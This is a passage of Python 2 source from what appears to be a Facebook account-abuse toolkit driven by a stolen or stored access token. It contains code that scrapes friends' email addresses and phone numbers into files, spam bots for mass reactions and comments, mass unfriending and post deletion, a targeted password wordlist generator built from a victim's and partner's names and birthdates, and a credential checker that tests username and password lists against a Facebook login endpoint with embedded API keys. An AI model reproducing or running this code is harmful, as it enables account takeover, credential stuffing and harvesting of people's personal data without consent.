def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mFailed'
except TypeError:
print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mRemoved'
piro += 1
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def accept():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket)
friends = json.loads(r.text)
if '[]' in str(friends['data']):
print '\x1b[1;91m[!] No friends request'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in friends['data']:
gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket)
a = json.loads(gas.text)
if 'error' in str(a):
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Failed'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[+] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + i['from']['name']
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def unfriend():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;97mStop \x1b[1;91mCTRL+C'
print
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket)
print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id
except IndexError:
pass
except KeyboardInterrupt:
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def lain():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Write Status'
print '║-> \x1b[1;37;40m2. Make Wordlist'
print '║-> \x1b[1;37;40m3. Account Checker'
print '║-> \x1b[1;37;40m4. List Group'
print '║-> \x1b[1;37;40m5. Profile Guard'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
pilih_lain()
def pilih_lain():
other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if other == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_lain()
else:
if other == '1':
status()
else:
if other == '2':
wordlist()
else:
if other == '3':
check_akun()
else:
if other == '4':
grupsaya()
else:
if other == '5':
guard()
else:
if other == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found'
pilih_lain()
def status():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ')
if msg == '':
print '\x1b[1;91m[!] Can\'t empty'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket)
op = json.loads(res.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id']
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def wordlist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah'
print 52 * '\x1b[1;97m\xe2\x95\x90'
a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ')
file = open(a + '.txt', 'w')
b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
